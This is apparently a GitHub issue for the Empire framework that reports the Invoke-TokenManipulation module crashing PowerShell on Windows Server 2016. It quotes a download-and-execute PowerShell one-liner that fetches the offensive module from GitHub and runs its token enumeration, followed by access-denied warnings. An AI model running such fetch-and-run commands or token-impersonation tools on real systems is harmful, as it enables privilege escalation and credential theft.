Invoke-TokenManipulation Crashes PowerShell on Windows Server 2016
cclements opened this issue · comments
Empire Version
Invoke-TokenManipulation.ps1 from commit 51fc822
OS Information (Linux flavor, Python version)
Windows Server 2016 Standard 14393 x64
Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
When run from an Administrator console on the target, I receive errors about not being able to impersonate SYSTEM, followed by a few more warnings before the powershell process crashes.
Screenshot of error, embedded text output, or Pastebin link to the error
C:\Users\Administrator>powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-TokenManipulation.ps1'); Invoke-TokenManipulation -Enumerate"
WARNING: Unable to impersonate SYSTEM, the script will not be able to enumerate all tokens
WARNING: Failed to get processes primary token. ProcessId: 6912. ProcessName Agent.Listener. Error: 5
WARNING: Failed to get processes primary token. ProcessId: 6744. ProcessName AgentService. Error: 5
WARNING: Failed to get processes primary token. ProcessId: 2340. ProcessName ALsvc. Error: 5
WARNING: Failed to get processes primary token. ProcessId: 4292. ProcessName chrome. Error: 5
WARNING: Failed to get processes primary token. ProcessId: 4788. ProcessName chrome. Error: 5
WARNING: Failed to get processes primary token. ProcessId: 9308. ProcessName chrome. Error: 5
WARNING: Failed to get processes primary token. ProcessId: 9648. ProcessName chrome. Error: 5
WARNING: Failed to get processes primary token. ProcessId: 10668. ProcessName chrome. Error: 5
WARNING: Failed to get processes primary token. ProcessId: 3696. ProcessName conhost. Error: 5
WARNING: Failed to get processes primary token. ProcessId: 3704. ProcessName conhost. Error: 5
WARNING: Failed to get processes primary token. ProcessId: 3720. ProcessName conhost. Error: 5